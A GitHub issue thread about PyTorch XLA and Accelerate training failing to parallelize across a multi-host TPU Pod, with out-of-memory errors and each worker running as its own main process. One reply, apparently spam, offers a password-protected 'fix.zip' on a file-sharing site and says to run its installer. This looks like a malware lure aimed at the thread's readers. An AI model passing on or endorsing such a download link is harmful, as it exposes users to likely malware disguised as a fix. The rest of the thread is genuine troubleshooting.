### ISSUE TITLE
Parallelization on multi-host TPU Pod not working

### ISSUE THREAD

**Issue by ayukh** [huggingface/accelerate#3058]
### System Info

```Shell
torch~=2.3.1
torch_xla[tpu]~=2.3.0
accelerate=0.32.1
transformers=4.42.4
CLI env output:
transformers version: 4.42.4
Platform: Linux-5.19.0-1022-gcp-x86_64-with-glibc2.35
Python version: 3.10.12
Huggingface_hub version: 0.23.4
Safetensors version: 0.4.3
Accelerate version: 0.32.1
Accelerate config: not found
PyTorch version (GPU?): 2.3.1+cu121 (False)
Tensorflow version (GPU?): not installed (NA)
Flax version (CPU?/GPU?/TPU?): not installed (NA)
Jax version: not installed
JaxLib version: not installed
```

### Information

- [ ] The official example scripts
- [X] My own modified scripts

### Tasks

- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)
- [X] My own task or dataset (give details below)

### Reproduction

1. Simple code with default HuggingFace trainer for Gemma-2-9B
2. Add FSDP v2 config (xla: True)
3. Wrap Trainer in Accelerator()
4. Can launch either without config or using XLA config after using accelerate config

### Expected behavior

We have access to v4 and v5e TPU Pods and currently we are testing if we can finetune on `v5litepod-256` TPU Pod. When we launch a training code, we can see that the time spent on one batch is too big (8 seconds/sample), which already looks abnormal.
We have tested different batch sizes - first we used `per_device_train_batch_size=1` and we could start a training process using this, however, number of steps is equal to number of samples in training dataset - I assume this is normal for XLA training, but I am not sure whether number of devices is being used to calculate number of steps and if it should be more than 1 for our TPU Pod.
We also tried `per_device_train_batch_size=512` or less and we get the following OOM RAM error:
torch_xla._XLAC._xla_step_marker(
```
RuntimeError: Bad StatusOr access: RESOURCE_EXHAUSTED: XLA:TPU compile permanent error. Ran out of memory in memory space hbm. Used 44.54G of 15.75G hbm. Exceeded hbm capacity by 28.80G.
 Total hbm usage >= 44.80G:
     reserved        258.00M
     program          44.54G
     arguments            0B
 Output size 0B; shares 0B with arguments.
```
From my understanding this should not be an issue for a 256 core Pod, though by using default Trainer instead of a Custom one I do not see whether the communication between devices and data sharding can be somehow configured by us anywhere else. 
We have followed [GCP](https://cloud.google.com/tpu/docs/v5e-training#pytorch-xla) and [torch](https://pytorch.org/xla/master/#running-on-tpu-pods) documentation, according to which we should just pass `--worker=all` flag to initialize training on all nodes at once; the device communication is supposed to be handled in the torch backend. Using this we have tried launching: 
* with or without accelerate config
* using xmp.spawn()
* plain Trainer without accelerate wrapping 
* using [torchrun](https://pytorch.org/ignite/generated/ignite.distributed.launcher.Parallel.html)

In all cases I can see 64 processes being launched (=64 nodes in our TPU Pod) and it looks like the proccesses are not synchronized. Moreover, accelerate and torch see each node/worker as a main process with world_size=1.
While I know that the parallelization works well for single-host TPUs like v2-8, the lack of updated documentation and examples of training on multi-host TPU Pods makes me unsure whether the problem comes from our side or not. I would be thankful if you can confirm if there is solution to our problem, thanks!

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pythoncrazy** [comment]
Hi, 
Given that pytorch xla dropped xla_dist in version v2.1.0, and accelerate calls xla_dist, how were you able to run the code? I am currently using torch xla 2.0.0 to bypass this, but any help and guidance would be deeply appreciated.

**Comment by steveepreston** [comment]
+1
Getting same error
